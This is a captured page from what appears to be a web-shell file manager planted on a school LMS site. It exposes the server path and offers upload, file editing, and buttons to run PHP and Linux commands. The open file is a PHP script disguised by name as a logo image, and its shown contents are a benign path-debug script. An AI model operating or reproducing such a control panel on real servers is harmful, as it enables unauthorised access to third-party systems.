๐ File Manager
๐
/
/
home
/
u449181296
/
domains
/
birulogi.smakpbaleendah.sch.id
/
public_html
/
lms
/
tukang-ngatur
/
assets
/
img
/
qr-logos
/home/u449181296/domains/birulogi.smakpbaleendah.sch.id/public_html/lms/tukang-ngatur/assets/img/qr-logos
Upload
Name
Size
Date
CHMOD
Action
โ FILE โ
logo_1773801405.php
6.73 KB
2026-03-18 02:36
644
(rw-r--r--)
Edit
|
Rename
|
Preview
|
Del
Edit
<?php echo "<h2>๐ Debug Path SmartTren</h2>"; // 1. Cek lokasi file ini berada echo "<b>Lokasi File Debug:</b> " . __FILE__ . "<br>"; // 2. Cek Public Path (Tempat folder build seharusnya ada) $publicPath = realpath(dirname(__FILE__)); echo "<b>Public Path Terdeteksi:</b> " . $publicPath . "<br><br>"; // 3. Cek Folder Build $buildPath = $publicPath . '/build'; echo "<b>Cek Folder Build:</b> " . (is_dir($buildPath) ? "โ Ditemukan" : "โ TIDAK ADA") . "<br>"; // 4. Cek File Manifest (Coba 2 lokasi umum) $manifest1 = $buildPath . '/manifest.json'; $manifest2 = $buildPath . '/.vite/manifest.json'; echo "<b>Cek manifest.json (Utama):</b> " . (file_exists($manifest1) ? "โ Ditemukan" : "โ TIDAK ADA") . "<br>"; echo "<b>Cek .vite/manifest.json (Vite 5+):</b> " . (file_exists($manifest2) ? "โ Ditemukan" : "โ TIDAK ADA") . "<br><br>"; // 5. Rekomendasi untuk AppServiceProvider echo "<h3>๐ Rekomendasi Konfigurasi:</h3>"; echo "Copy-paste path ini ke AppServiceProvider register():<br>"; echo "<code style='background: #eee; padding: 5px;'>return '" . $publicPath . "';</code><br><br>"; if (file_exists($manifest1)) { echo "Gunakan manifest path ini di Blade:<br>"; echo "<code style='background: #eee; padding: 5px;'>" . $manifest1 . "</code>"; } elseif (file_exists($manifest2)) { echo "Gunakan manifest path ini di Blade (Vite 5):<br>"; echo "<code style='background: #eee; padding: 5px;'>" . $manifest2 . "</code>"; } ?>
Save
๐งช PHP Preview
<?php echo 'hello'; ?>
Run PHP
๐ฅ Linux CMD
Run CMD